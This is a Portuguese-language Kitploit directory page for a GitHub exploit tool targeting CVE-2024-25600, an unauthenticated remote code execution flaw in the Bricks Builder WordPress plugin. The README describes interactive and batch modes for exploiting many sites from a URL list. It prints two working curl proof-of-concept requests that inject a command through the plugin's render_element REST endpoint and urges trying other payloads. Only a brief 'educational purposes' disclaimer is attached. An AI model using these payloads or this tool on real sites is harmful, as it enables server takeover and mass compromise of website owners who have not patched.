Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — Ferramenta automatizada de exploit para CVE-2024-25600, permitindo execução remota de código não autenticada em sites WordPress usando o plugin Bricks Builder. Suporta modos interativo e em lote para execução de comandos. | Kitploit
Ferramentas/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

Ferramenta automatizada de exploit para CVE-2024-25600, permitindo execução remota de código não autenticada em sites WordPress usando o plugin Bricks Builder. Suporta modos interativo e em lote para execução de comandos.

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Exploração CVE-2024-25600 🚀

Descrição 📝

Esta ferramenta 🛠️ foi projetada para explorar a vulnerabilidade CVE-2024-25600 🕳️ encontrada no plugin Bricks Builder para WordPress. A vulnerabilidade permite a execução remota de código não autenticada em sites afetados 💻. A ferramenta automatiza o processo de exploração recuperando nonces e enviando requisições especialmente elaboradas para executar comandos arbitrários.

Recursos 🌟

  • Modo Interativo: Interaja com o site alvo em tempo real 🕹️.
  • Modo Lote: Escaneie e explore vários sites a partir de uma lista 📋.
  • Execução de Comandos: Execute comandos arbitrários no servidor alvo ⚙️.

Instalação 🛠️

  1. Clone este repositório para sua máquina local 🖥️ usando git clone.
  2. Navegue até o diretório do repositório clonado.
  3. Instale as bibliotecas Python necessárias usando pip install -r requirements.txt.

Uso 📖

Modo Interativo 🎮

  1. Execute a ferramenta com python exploit.py -u <URL> para iniciar o modo interativo.
  2. Siga as instruções na tela para enviar comandos ao servidor alvo.

Modo Lote 📊

  1. Prepare um arquivo de texto com uma lista de URLs alvo.
  2. Execute a ferramenta com python exploit.py -l <caminho_do_arquivo> para escanear e explorar os sites listados.

Prova de Conceito (PoC) 📝

A PoC base fornecida pela divulgação é a seguinte:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Atualização: Segunda PoC (mais confiável)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

É possível que cargas úteis adicionais possam produzir melhores resultados. Se meu exploit ou prova de conceito não funcionar para você, incentivo a experimentar cargas úteis alternativas para encontrar uma solução mais eficaz.

Substitua [HOST] pelo site alvo e [NONCE] pelo valor do nonce recuperado do site.

Referência 📖

Para mais informações sobre a vulnerabilidade CVE-2024-25600, consulte a divulgação detalhada em Snicco.io.

Aviso Legal ⚠️

As informações fornecidas neste README são apenas para fins educacionais. Invadir sites ou redes sem autorização é ilegal e antiético. 🚫

Agradecimentos 🙏

Créditos aos pesquisadores de segurança que descobriram e reportaram esta vulnerabilidade, fornecendo à comunidade informações e ferramentas para ajudar a proteger suas aplicações web.

Baixar ferramenta